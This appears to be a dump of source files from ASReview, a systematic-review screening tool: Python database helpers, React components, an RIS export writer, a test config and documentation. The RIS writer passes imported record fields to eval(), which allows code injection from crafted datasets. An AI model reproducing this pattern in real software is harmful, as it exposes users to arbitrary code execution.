sf_feature_extraction[i],\n                    sf_training_sets[i],\n                    sf_time[i],\n                    sf_notes[i],\n                )\n                for i in range(n_records_labeled)\n            ]\n            cur.executemany(\n                \"\"\"INSERT INTO results VALUES\n                            (?, ?, ?, ?, ?, ?, ?, ?, ?)\"\"\",\n                db_rows,\n            )\n            con.commit()\n\n\ndef create_decision_changes_table(sql_fp):\n    \"\"\"Create an empty table that will contain the record_ids and new labels\n    of the records whose label was changed after the original labeling action.\n    Also contains the time at which the label was changed.\"\"\"\n    with sqlite3.connect(sql_fp) as con:\n        cur = con.cursor()\n\n        cur.execute(\n            \"\"\"CREATE TABLE decision_changes\n                            (record_id INTEGER,\n                            new_label INTEGER,\n                            time INTEGER)\"\"\"\n        )\n\n        con.commit()\n\n\n# Disable is_converted_check.\ndef rollback_conversion(fp, from_version=1, to_version=0, check_is_converted=True):\n    if from_version != 1 or to_version != 0:\n        raise ValueError(\n            f\"Not possible to roll back conversion from v{from_version} \"\n            f\"to v{to_version}.\"\n        )\n\n    if check_is_converted and not is_converted_project(fp):\n        raise ValueError(f\"Project file at {fp} is not a converted \" f\"project file.\")\n\n    fp = Path(fp)\n    legacy_fp = Path(fp, \"legacy\")\n\n    # Delete everything other than the legacy folder.\n    for item in fp.iterdir():\n        if item.is_file():\n            item.unlink()\n        elif item.is_dir() and (item.name != \"legacy\"):\n            shutil.rmtree(item)\n        else:\n            pass\n\n    # Copy from legacy folder and delete it after.\n    shutil.copytree(legacy_fp, fp, dirs_exist_ok=True)\n    shutil.rmtree(legacy_fp)\n\n\ndef is_converted_project(fp):\n    \"\"\"Check if asreview file has been converted from v0 to v1.\"\"\"\n    # Check if there is a legacy project.json and it has v0.\n    try:\n        with open(Path(fp, \"legacy\", \"project.json\"), \"r\") as f:\n            project_config_old = json.load(f)\n    except FileNotFoundError:\n        return False\n\n    if project_config_old[\"version\"][0] != \"0\":\n        return False\n\n    # Check if the current project.json has 'state_version' == 1.\n    with open(Path(fp, \"project.json\"), \"r\") as f:\n        project_config_current = json.load(f)\n\n    try:\n        current_state_version = project_config_current[\"state_version\"]\n    except KeyError:\n        return False\n\n    if current_state_version[0] == \"1\":\n        return True\n    else:\n        return False\n" }, { "alpha_fraction": 0.5350118279457092, "alphanum_fraction": 0.5428796410560608, "avg_line_length": 29.261905670166016, "blob_id": "aba62ec2ad8e9bc0400fdc0bdd0b28ab1d820d75", "content_id": "387b39b3ebfbb191b5203d6f7dd8279fce777247", "detected_licenses": [ 
"Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1271, "license_type": "permissive", "max_line_length": 178, "num_lines": 42, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/EnoughPriorBanner.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Banner } from \"material-ui-banner\";\nimport InfoOutlinedIcon from \"@mui/icons-material/InfoOutlined\";\n\nconst EnoughPriorBanner = (props) => {\n return (\n <div>\n <Banner\n open={props.reminder}\n onClose={props.toggleReminder}\n label={`${props.n_prior_exclusions} records were labeled as irrelevant. You have found enough irrelevant records as prior knowledge. Try to search for relevant records?`}\n icon={<InfoOutlinedIcon sx={{ color: \"text.secondary\" }} />}\n iconProps={{\n sx: { bgcolor: \"transparent\" },\n }}\n buttonLabel=\"Search\"\n buttonOnClick={props.onClickPriorSearch}\n buttonProps={{\n sx: { color: \"text.secondary\" },\n }}\n dismissButtonLabel=\"Show more\"\n dismissButtonProps={{\n sx: { color: \"text.secondary\" },\n }}\n paperProps={{\n sx: {\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.900\" : \"grey.50\",\n },\n }}\n cardProps={{\n sx: {\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.900\" : \"grey.50\",\n },\n }}\n />\n </div>\n );\n};\n\nexport default EnoughPriorBanner;\n" }, { "alpha_fraction": 0.609343945980072, "alphanum_fraction": 0.6312127113342285, "avg_line_length": 27.742856979370117, "blob_id": "5fdfb8c7866a92d0aa0be3ed01cf976adf8df05e", "content_id": "28a7c379b8692b55a1ad591cbd500045b42ecec5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1006, "license_type": "permissive", "max_line_length": 66, "num_lines": 35, "path": "/asreview/webapp/src/Components/CardErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useQueryClient } from \"react-query\";\nimport { Backdrop, Button, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nconst StyledBackdrop = styled(Backdrop)(({ theme }) => ({\n borderRadius: 16,\n flexDirection: \"column\",\n position: \"absolute\",\n zIndex: 1,\n ...(theme.palette.mode === \"light\" && {\n backgroundColor: \"rgba(255, 255, 255, 0.8)\",\n }),\n ...(theme.palette.mode === \"dark\" && {\n backgroundColor: \"rgba(18, 18, 18, 0.8)\",\n }),\n}));\n\nexport default function CardErrorHandler(props) {\n const queryClient = useQueryClient();\n const resetQuery = () => {\n queryClient.resetQueries(props.queryKey);\n };\n\n return (\n <StyledBackdrop open={props.isError}>\n <Typography align=\"center\" sx={{ color: \"text.secondary\" }}>\n {props.error ? 
props.error.message : null}\n </Typography>\n <Button variant=\"outlined\" onClick={resetQuery}>\n Try to Refresh\n </Button>\n </StyledBackdrop>\n );\n}\n" }, { "alpha_fraction": 0.4466131031513214, "alphanum_fraction": 0.4684270918369293, "avg_line_length": 19.738094329833984, "blob_id": "ed3a5b7948f5394df56f73b66f45547a3ed20d28", "content_id": "adb3a7385a9ac26cf18d58dc71e42aaf712c9dbd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 871, "license_type": "permissive", "max_line_length": 71, "num_lines": 42, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/SavingStateBox.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Typography } from \"@mui/material\";\n\nexport default function SavingStateBox(props) {\n const [state, setState] = React.useState(false);\n\n React.useEffect(() => {\n if (props.isSaving) {\n setState(true);\n } else {\n setTimeout(() => {\n setState(false);\n }, 1000);\n }\n }, [props.isSaving]);\n\n React.useEffect(() => {\n return () => {\n setState(false);\n };\n }, []);\n\n return (\n <Box\n sx={{\n bgcolor: (theme) => {\n if (theme.palette.mode === \"dark\") {\n return \"#282828\";\n } else {\n return \"rgba(0, 0, 0, 0.06)\";\n }\n },\n pl: 1,\n pr: 1,\n }}\n >\n <Typography variant=\"subtitle2\" sx={{ color: \"text.secondary\" }}>\n {!state ? \"Saved\" : \"Saving...\"}\n </Typography>\n </Box>\n );\n}\n" }, { "alpha_fraction": 0.6369102597236633, "alphanum_fraction": 0.6373727917671204, "avg_line_length": 26.367088317871094, "blob_id": "1685b4663d4a74a262a6e2fb896272140c8a5996", "content_id": "458b96b8ab72065806b41a884f0a53374ac25b41", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2162, "license_type": "permissive", "max_line_length": 76, "num_lines": 79, "path": "/asreview/webapp/src/redux/reducers/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import {\n AUTHENTICATION,\n MY_PROJECTS,\n OAUTH_SERVICES,\n SET_ASREVIEW_VERSION,\n SET_BOOT_DATA,\n SET_PROJECT,\n TOGGLE_HELP_DIALOG,\n} from \"../../constants/action-types\";\n\nconst initialState = {\n asreview_version: undefined,\n authentication: undefined,\n email_verification: undefined,\n email_config: undefined,\n allow_account_creation: undefined,\n allow_teams: undefined,\n oAuthData: {\n services: {},\n compareKey: \"oAuthCompareKey\", // these 2 values are used when the oAuth\n messageType: \"oAuthMessage\", // popup has to communicate with the opener\n },\n status: undefined,\n project_id: null,\n onHelpDialog: false,\n myProjects: [],\n};\n\nfunction rootReducer(state = initialState, action) {\n switch (action.type) {\n case SET_ASREVIEW_VERSION:\n return Object.assign({}, state, {\n asreview_version: action.asreview_version,\n });\n case AUTHENTICATION:\n return Object.assign({}, state, {\n authentication: action.authentication,\n });\n case SET_PROJECT:\n return Object.assign({}, state, {\n project_id: action.project_id,\n });\n case TOGGLE_HELP_DIALOG:\n return Object.assign({}, state, {\n onHelpDialog: !state.onHelpDialog,\n });\n // set boot data\n case SET_BOOT_DATA:\n return Object.assign({}, state, {\n asreview_version: action.data.version,\n authentication: action.data.authentication,\n status: action.data.status,\n email_verification: Boolean(action.data.email_verification),\n email_config: Boolean(action.data.email_config),\n 
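// Boolean() maps a missing or undefined flag to false\n        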
allow_account_creation: Boolean(action.data.allow_account_creation),\n allow_teams: Boolean(action.data.allow_teams),\n });\n // set my projects list\n case MY_PROJECTS:\n return Object.assign({}, state, {\n myProjects: action.data,\n });\n // set OAuth services\n case OAUTH_SERVICES: {\n const newState = {\n ...state.oAuthData,\n services: action.data,\n };\n return Object.assign({}, state, {\n oAuthData: newState,\n });\n }\n // default\n default:\n return state;\n }\n}\n\nexport default rootReducer;\n" }, { "alpha_fraction": 0.5699905753135681, "alphanum_fraction": 0.5762818455696106, "avg_line_length": 31.773195266723633, "blob_id": "00c158941ddb2ea6cccde7384bbdd2ecb6e92cfa", "content_id": "d69e998fd77d6c945b7437ce52b4d633ce11f586", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3179, "license_type": "permissive", "max_line_length": 83, "num_lines": 97, "path": "/asreview/io/ris_writer.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pandas as pd\nimport rispy\n\n\nclass RISWriter:\n \"\"\"RIS file writer.\"\"\"\n\n name = \"ris\"\n label = \"RIS\"\n caution = \"Available only if you imported a RIS file when creating the project\"\n write_format = \".ris\"\n\n @classmethod\n def write_data(cls, df, fp, labels=None, ranking=None):\n \"\"\"Export dataset.\n\n Arguments\n ---------\n df: pandas.Dataframe\n Dataframe of all available record data.\n fp: str, pathlib.Path\n File path to the RIS file, if exists.\n labels: list, numpy.ndarray\n Current labels will be overwritten by these labels\n (including unlabelled). 
No effect if labels is None.\n        ranking: list\n            Reorder the dataframe according to these (internal) indices.\n            Default ordering if ranking is None.\n\n        Returns\n        -------\n        str or None\n            The RIS content as a string if fp is None; otherwise the records\n            are written to the file at fp.\n        \"\"\"\n\n        # Turn pandas DataFrame into records (list of dictionaries) for rispy\n        records = df.to_dict(\"records\")\n\n        # Create an array for storing modified records\n        records_new = []\n\n        # Iterate over all available records\n        for rec in records:\n\n            def _notnull(v):\n                if isinstance(v, list):\n                    return False\n                return pd.notnull(v)\n\n            # Remove all nan values\n            rec_copy = {k: v for k, v in rec.items() if _notnull(v)}\n\n            for m in [\"authors\", \"keywords\", \"notes\"]:  # AU, KW, N1\n                # Parse stringified list fields back into Python lists\n                try:\n                    rec_copy[m] = eval(rec_copy[m])\n                except Exception:\n                    rec_copy[m] = []\n\n            # Get label for record if specified, if not specified set to -1\n            included = rec_copy.pop(\"included\", -1)\n\n            # Map labels to notes\n            dict_note = {\n                -1: \"ASReview_not_seen\",\n                0: \"ASReview_irrelevant\",\n                1: \"ASReview_relevant\",\n            }\n            rec_copy[\"notes\"].insert(0, dict_note[included])\n\n            # Append the copied and updated record to the new list\n            records_new.append(rec_copy)\n\n        # From buffered dataframe\n        if fp is None:\n            # Write the whole content to buffer\n            return rispy.dumps(records_new)\n\n        # From IO dataframe\n        else:\n            # Write the whole content to a file\n            with open(fp, \"w\", encoding=\"utf8\") as fp:\n                rispy.dump(records_new, fp)\n" }, { "alpha_fraction": 0.762499988079071, "alphanum_fraction": 0.762499988079071, "avg_line_length": 25.83333396911621, "blob_id": "8b733f13cafd2ec50a6debef83444334b8f9bddb", "content_id": "3de4ccd1af9e6607a4014d98fcfd9777a3e8e268", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 160, "license_type": "permissive", "max_line_length": 37, "num_lines": 6, "path": "/asreview/webapp/tests/config/auth_no_creation.toml", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "TESTING = true\nDEBUG = true\nSECRET_KEY = \"my_very_secret_key\"\nSECURITY_PASSWORD_SALT = \"my_salt\"\nAUTHENTICATION_ENABLED = true\nALLOW_ACCOUNT_CREATION = false" }, { "alpha_fraction": 0.621076226234436, "alphanum_fraction": 0.6219730973243713, "avg_line_length": 27.58974266052246, "blob_id": "eb95f2431b0690f787f7a5bf93939f32f3fad3a2", "content_id": "c1e72816dd8395fbf0018e8a6b53f8b3e77258f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2230, "license_type": "permissive", "max_line_length": 70, "num_lines": 78, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/ProjectsOverview.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Fab, Stack } from \"@mui/material\";\nimport { Add } from \"@mui/icons-material\";\nimport {\n  DashboardPageHeader,\n  NumberCard,\n  ProjectTable,\n} from \"../DashboardComponents\";\nimport { useToggle } from \"../../hooks/useToggle\";\nimport { ActionsFeedbackBar } from \"../../Components\";\nimport { ProjectImportDialog } from \"../../ProjectComponents\";\nimport { SetupDialog } from \"../../ProjectComponents/SetupComponents\";\n\nconst ProjectsOverview = (props) => {\n  const [onImportDialog, toggleImportDialog] = useToggle();\n  const [feedbackBar, setFeedbackBar] = React.useState({\n    open: false,\n    message: null,\n  });\n\n  const resetFeedbackBar = () => {\n    setFeedbackBar({\n      ...feedbackBar,\n      
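// keep the last message; only the open flag is reset\n      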
open: false,\n });\n };\n\n return (\n <>\n <DashboardPageHeader\n mobileScreen={props.mobileScreen}\n toggleImportDialog={toggleImportDialog}\n />\n <Box className=\"main-page-body-wrapper\">\n <Stack className=\"main-page-body\" spacing={6}>\n <NumberCard mobileScreen={props.mobileScreen} />\n <ProjectTable\n onNavDrawer={props.onNavDrawer}\n projectCheck={props.projectCheck}\n setFeedbackBar={setFeedbackBar}\n setProjectCheck={props.setProjectCheck}\n toggleProjectSetup={props.toggleProjectSetup}\n toggleAcceptanceSetup={props.AcceptanceDialog}\n />\n </Stack>\n </Box>\n <Fab\n className=\"main-page-fab\"\n color=\"primary\"\n onClick={props.toggleProjectSetup}\n variant=\"extended\"\n >\n <Add sx={{ mr: 1 }} />\n Create\n </Fab>\n <ProjectImportDialog\n mobileScreen={props.mobileScreen}\n open={onImportDialog}\n onClose={toggleImportDialog}\n setFeedbackBar={setFeedbackBar}\n />\n <SetupDialog\n mobileScreen={props.mobileScreen}\n open={props.onProjectSetup}\n onClose={props.toggleProjectSetup}\n setFeedbackBar={setFeedbackBar}\n />\n <ActionsFeedbackBar\n center\n onClose={resetFeedbackBar}\n open={feedbackBar.open}\n feedback={feedbackBar.message}\n />\n </>\n );\n};\n\nexport default ProjectsOverview;\n" }, { "alpha_fraction": 0.5065146684646606, "alphanum_fraction": 0.509772002696991, "avg_line_length": 32.0107536315918, "blob_id": "10db87e79e144873f3386bb856bd4af47dff5a1a", "content_id": "d0871d340957e343dace9d77d465cc774d2fd99e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 9210, "license_type": "permissive", "max_line_length": 102, "num_lines": 279, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/AddDataset.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n Box,\n Button,\n DialogContent,\n DialogTitle,\n Divider,\n Fade,\n FormControl,\n FormControlLabel,\n FormLabel,\n Link,\n Radio,\n RadioGroup,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { AppBarWithinDialog } from \"../../../Components\";\nimport { DatasetFromEntryPoint, DatasetFromURL } from \"../DataComponents\";\nimport { InfoCard } from \"../../SetupComponents\";\nimport { ImportFromFile } from \"../../../ProjectComponents\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps, projectModes } from \"../../../globals.js\";\n\nconst PREFIX = \"AddDataset\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n form: `${PREFIX}-form`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n overflowY: \"hidden\",\n [`& .${classes.form}`]: {\n height: \"calc(100% - 64px)\",\n overflowY: \"scroll\",\n padding: \"24px 48px 48px 48px\",\n [theme.breakpoints.down(\"md\")]: {\n height: \"calc(100% - 56px)\",\n padding: \"32px 24px 48px 24px\",\n },\n },\n}));\n\nconst AddDataset = (props) => {\n const queryClient = useQueryClient();\n\n const [datasetSource, setDatasetSource] = React.useState(\"file\");\n const [file, setFile] = React.useState(null);\n const [url, setURL] = React.useState(\"\");\n const [extension, setExtension] = React.useState(null);\n const [benchmark, setBenchmark] = React.useState(null);\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n ProjectAPI.mutateData,\n {\n onSettled: () => {\n props.setDisableFetchInfo(false);\n 
queryClient.invalidateQueries(\"fetchInfo\");\n },\n onSuccess: () => {\n queryClient.invalidateQueries(\"fetchLabeledStats\");\n props.toggleAddDataset();\n },\n },\n );\n\n const handleDatasetSource = (event) => {\n setDatasetSource(event.target.value);\n // clear potential error\n reset();\n };\n\n const handleSaveDataset = React.useCallback(() => {\n mutate({\n project_id: props.project_id,\n file: file,\n url: url,\n extension: extension,\n benchmark: benchmark,\n });\n }, [benchmark, extension, file, mutate, props.project_id, url]);\n\n const handleClose = () => {\n props.toggleAddDataset();\n // clear potential error\n reset();\n };\n\n React.useEffect(() => {\n if (props.mode === projectModes.EXPLORATION) {\n setDatasetSource(\"benchmark\");\n }\n if (props.mode !== projectModes.EXPLORATION) {\n setDatasetSource(\"file\");\n }\n }, [props.mode]);\n\n // auto import once dataset is selected\n React.useEffect(() => {\n if (file || extension || benchmark) {\n handleSaveDataset();\n }\n }, [handleSaveDataset, file, benchmark, extension]);\n\n return (\n <Root>\n {props.mobileScreen && (\n <AppBarWithinDialog\n disableStartIcon={isLoading}\n onClickStartIcon={handleClose}\n startIconIsClose={false}\n title=\"Dataset\"\n />\n )}\n {!props.mobileScreen && (\n <Fade in>\n <Stack className=\"dialog-header\" direction=\"row\">\n <DialogTitle>Dataset</DialogTitle>\n <Box className=\"dialog-header-button right\">\n <Button disabled={isLoading} onClick={handleClose}>\n Close\n </Button>\n </Box>\n </Stack>\n </Fade>\n )}\n <Divider />\n <Fade in>\n <DialogContent className={classes.form}>\n <Stack spacing={3}>\n {props.datasetAdded && (\n <InfoCard info=\"Editing dataset removes the added prior knowledge\" />\n )}\n <FormControl disabled={isLoading} component=\"fieldset\">\n <FormLabel component=\"legend\">Add a dataset from</FormLabel>\n <RadioGroup\n row\n aria-label=\"dataset source\"\n name=\"row-radio-buttons-group\"\n value={datasetSource}\n >\n <FormControlLabel\n value=\"file\"\n control={<Radio />}\n label=\"File\"\n onChange={handleDatasetSource}\n />\n <FormControlLabel\n value=\"url\"\n control={<Radio />}\n label=\"URL or DOI\"\n onChange={handleDatasetSource}\n />\n {props.mode === projectModes.ORACLE && (\n <FormControlLabel\n value=\"extension\"\n control={<Radio />}\n label=\"Extension\"\n onChange={handleDatasetSource}\n />\n )}\n {(props.mode === projectModes.EXPLORATION ||\n props.mode === projectModes.SIMULATION) && (\n <FormControlLabel\n value=\"benchmark\"\n control={<Radio />}\n label=\"Benchmark datasets\"\n onChange={handleDatasetSource}\n />\n )}\n </RadioGroup>\n </FormControl>\n {(datasetSource === \"file\" || datasetSource === \"url\") && (\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n Supported formats are RIS (<code>.ris</code>, <code>.txt</code>)\n and tabular datasets (<code>.csv</code>, <code>.tab</code>,{\" \"}\n <code>.tsv</code>, <code>.xlsx</code>). The dataset should\n contain a title and abstract for each record.{\" \"}\n {props.mode !== projectModes.ORACLE\n ? \"The dataset should contain labels for each record. 
\"\n : \"\"}\n To optimally benefit from the performance of the active learning\n model, it is highly recommended to add a dataset without\n duplicate records and complete records.{\" \"}\n <Link\n underline=\"none\"\n href=\"https://asreview.readthedocs.io/en/latest/intro/datasets.html\"\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n )}\n {datasetSource === \"extension\" && (\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n Select a dataset from an extension.{\" \"}\n <Link\n underline=\"none\"\n href=\"https://asreview.readthedocs.io/en/latest/extensions/overview_extensions.html\"\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n )}\n {datasetSource === \"benchmark\" && (\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n The benchmark datasets were manually labeled and can be used to\n explore or demonstrate ASReview LAB. You can donate your dataset\n to the benchmark platform.{\" \"}\n <Link\n underline=\"none\"\n href=\"https://github.com/asreview/systematic-review-datasets\"\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n )}\n {datasetSource === \"file\" && (\n <ImportFromFile\n acceptFormat=\".txt,.tsv,.tab,.csv,.ris,.xlsx\"\n addFileError={error}\n file={file}\n setFile={setFile}\n isAddFileError={isError}\n isAddingFile={isLoading}\n reset={reset}\n />\n )}\n {datasetSource === \"url\" && (\n <DatasetFromURL\n project_id={props.project_id}\n addDatasetError={error}\n handleSaveDataset={handleSaveDataset}\n url={url}\n setURL={setURL}\n isAddDatasetError={isError}\n isAddingDataset={isLoading}\n reset={reset}\n />\n )}\n {datasetSource === \"extension\" && (\n <DatasetFromEntryPoint\n subset=\"plugin\"\n addDatasetError={error}\n extension={extension}\n setExtension={setExtension}\n isAddDatasetError={isError}\n isAddingDataset={isLoading}\n mobileScreen={props.mobileScreen}\n reset={reset}\n />\n )}\n {datasetSource === \"benchmark\" && (\n <DatasetFromEntryPoint\n subset=\"benchmark\"\n addDatasetError={error}\n benchmark={benchmark}\n setBenchmark={setBenchmark}\n isAddDatasetError={isError}\n isAddingDataset={isLoading}\n mobileScreen={props.mobileScreen}\n reset={reset}\n />\n )}\n </Stack>\n </DialogContent>\n </Fade>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(AddDataset);\n" }, { "alpha_fraction": 0.5372274518013, "alphanum_fraction": 0.5438091158866882, "avg_line_length": 24.86170196533203, "blob_id": "5e102ac679592be9ca78cde4957f4f97ccd9476a", "content_id": "118318def06962e8d7877f2b2679e754b1302444", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2431, "license_type": "permissive", "max_line_length": 87, "num_lines": 94, "path": "/asreview/webapp/src/ProjectComponents/DetailsComponents/DataFormCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useNavigate, useParams } from \"react-router-dom\";\nimport {\n Box,\n Button,\n Card,\n CardContent,\n Link,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography.js\";\nimport { historyFilterOptions } from \"../../globals.js\";\n\nconst PREFIX = \"DataFormCard\";\n\nconst classes = {\n cardContent: `${PREFIX}-card-content`,\n singleLine: `${PREFIX}-single-line`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.cardContent}`]: 
{\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"space-between\",\n padding: 24,\n paddingRight: 8,\n position: \"relative\",\n },\n\n [`& .${classes.singleLine}`]: {\n display: \"-webkit-box\",\n WebkitBoxOrient: \"vertical\",\n WebkitLineClamp: 1,\n whiteSpace: \"pre-line\",\n overflow: \"hidden\",\n },\n}));\n\nconst DataFormCard = (props) => {\n const navigate = useNavigate();\n const { project_id } = useParams();\n\n const handleClickViewPrior = () => {\n navigate(`/projects/${project_id}/history`);\n props.setHistoryFilterQuery([\n historyFilterOptions.find((e) => e.value === \"prior\"),\n ]);\n };\n\n return (\n <Root>\n <Card\n elevation={0}\n sx={{\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.900\" : \"grey.100\",\n }}\n >\n <CardContent className={classes.cardContent}>\n <Stack spacing={1} sx={{ alignItems: \"flex-start\" }}>\n <Box className={classes.singleLine}>\n <TypographySubtitle1Medium>\n {props.primary}\n </TypographySubtitle1Medium>\n </Box>\n {!props.isError && (\n <Typography\n variant=\"body2\"\n className={classes.singleLine}\n sx={{ color: \"text.secondary\" }}\n >\n {props.secondary}\n </Typography>\n )}\n {props.isError && (\n <Link component=\"button\" underline=\"none\" onClick={props.refetch}>\n Try to refresh\n </Link>\n )}\n </Stack>\n {props.primary === \"Prior knowledge\" && (\n <Button onClick={handleClickViewPrior}>View</Button>\n )}\n </CardContent>\n </Card>\n </Root>\n );\n};\n\nexport default DataFormCard;\n" }, { "alpha_fraction": 0.7657817006111145, "alphanum_fraction": 0.7657817006111145, "avg_line_length": 44.783782958984375, "blob_id": "f7d9c9e786db3fcf1bd303697a01349f7bc7a74e", "content_id": "7163e84f7950416424a28c09cef3a624ae5848b2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1695, "license_type": "permissive", "max_line_length": 91, "num_lines": 37, "path": "/docs/source/simulation_webapp.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Simulate via the webapp\n=======================\n\nTo run a simulation in the ASReview webapp, create a project as described in\n:doc:`project_create`. Most of the steps of the setup are identical or\nstraightforward. In this section, some of the differences are highlighted.\n\nIn the step on *Project Information*, select the \"Simulation\"\nmode (see figure below).\n\n.. figure:: ../images/setup_project_info_simulate.png\n :alt: ASReview LAB simulate option\n\nIn the step *Data*, import a :ref:`fully labeled dataset <data_labeled:fully labeled data>`\nor use one of the benchmark datasets.\n\nSelecting prior knowledge is relatively easy. In case you know relevant\nrecords to start with, use the search function. In case you don't, use the\n*Random* option. Toggle the button \"Relevant\" on top to see some random\nirrelevant records. Label some relevant and some irrelevant records.\n\n.. figure:: ../images/setup_prior_knowledge_random_simulate.png\n :alt: ASReview LAB Prior selection for simulation study\n\nThe step *Warm up* is differs slightly from the Oracle and Exploration mode.\nThis step starts the simulation, after some seconds, it will return \"Got it\".\nThis means, the simulation runs further in the background. You are returned to\nthe Analytics page.\n\n.. figure:: ../images/setup_warmup_simulate_background.png\n :alt: ASReview LAB simulation runs in background\n\nThis page now has a refresh button on the top right. 
If the simulation is not\nfinished yet, you can refresh the page or use the refresh button to follow the\nprogress. After a while, the Elas mascot on the left will hold a sign with\n\"finished\". Your simulation is now finished and you can study the results in\nthe analytics page.\n\n" }, { "alpha_fraction": 0.6119929552078247, "alphanum_fraction": 0.6155202984809875, "avg_line_length": 32.35293960571289, "blob_id": "ed118c2c20ff1b44fb5ba3e6714f859d5010502f", "content_id": "78b48cf57622c02091bb7ea3bbe5bd30e6a556dc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 567, "license_type": "permissive", "max_line_length": 74, "num_lines": 17, "path": "/asreview/webapp/src/Components/InlineErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Link, Stack, Typography } from \"@mui/material\";\nimport { Warning } from \"@mui/icons-material\";\n\nexport default function InlineErrorHandler(props) {\n return (\n <Stack direction=\"row\" spacing={1} sx={{ justifyContent: \"center\" }}>\n <Warning color=\"error\" fontSize=\"small\" />\n <Typography variant=\"body2\">\n {props.message}{\" \"}\n <Link component=\"button\" underline=\"none\" onClick={props.refetch}>\n {props.button ? \"Try to refresh\" : \"\"}\n </Link>\n </Typography>\n </Stack>\n );\n}\n" }, { "alpha_fraction": 0.3969375789165497, "alphanum_fraction": 0.4071456491947174, "avg_line_length": 28.445087432861328, "blob_id": "264e207b872ef0e2ebd2d5980765f62fc474f5ee", "content_id": "8079381604c6ac27f4854af38c4f032ba42cb399", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5094, "license_type": "permissive", "max_line_length": 80, "num_lines": 173, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/RecordCardNote.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useParams } from \"react-router-dom\";\nimport {\n Avatar,\n Button,\n Card,\n CardContent,\n Collapse,\n FormControl,\n OutlinedInput,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport ElasAvatar from \"../../images/ElasAvatar.svg\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst RecordCardNote = (props) => {\n const { project_id } = useParams();\n\n const handleClickEditNote = (prevNote, doc_id) => {\n props.setNote({\n data: prevNote,\n editing: doc_id,\n });\n };\n\n const handleClickSaveNote = (prevNote) => {\n if (props.note?.data !== prevNote) {\n props.mutate({\n project_id: project_id,\n doc_id: props.record.id,\n label: props.record.included,\n note: props.note?.data,\n 